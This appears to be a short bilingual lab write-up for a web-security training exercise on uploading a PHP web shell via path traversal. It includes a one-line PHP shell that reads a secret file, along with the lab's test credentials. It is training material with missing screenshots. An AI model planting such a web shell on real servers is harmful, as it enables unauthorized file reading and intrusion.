03 Lab: Web shell upload via path traversal
Objetivo
This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file
/home/carlos/secret
. Submit this secret using the button provided in the lab banner.You can log in to your own account using the following credentials:
wiener:peter
Solución
Exploramos el inicio de sesión y nos permite subir imagen


https://0a9f00a50375fb3782ee154f00be0000.web-security-academy.net/files/avatars/04.png
https://0a9f00a50375fb3782ee154f00be0000.web-security-academy.net/files/avatars/04.png

<?php echo file_get_contents('/home/carlos/secret'); ?>


The server is configured to prevent execution of user-supplied files


Esto era el secrets:

Observamos el Admin=False

Last updated